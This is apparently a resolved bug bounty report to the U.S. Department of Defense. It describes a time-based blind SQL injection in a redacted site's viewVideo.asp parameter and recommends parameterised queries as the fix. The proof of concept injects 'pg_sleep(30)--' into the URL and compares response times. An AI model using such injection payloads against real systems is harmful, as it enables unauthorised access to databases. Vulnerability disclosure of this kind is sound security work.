Blind SQL Injection on DoD Site
Medium
U
U.S. Dept Of Defense
Submitted None
Actions:
Reported by
mr_r3boot
Vulnerability Details
Technical details and impact analysis
Hi There, One of the DoD Site is vulnerable to blind sql injection.
#Affected Domain:
www.███
#PoC:
Navigate to below url
``http://www.█████████/viewVideo.asp?t=7``
Just replace ``7`` with ``pg_sleep(__30__)--``
***GET /viewVideo.asp?t=pg_sleep(__30__)--***
As a response you can see time delay compared with ``viewVideo.asp?t=7``
#####Time Slot:
*viewVideo.asp?t=7* -----------> 240-330 milliseconds
*viewVideo.asp?t=pg_sleep(__30__)--* -----------> 15000-19000 milliseconds
#Fix:
Should sanitize the dangerous input or using parameterised queries.
Let me know if any further info is required.
Regards,
**Mr_R3boot**.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
SQL Injection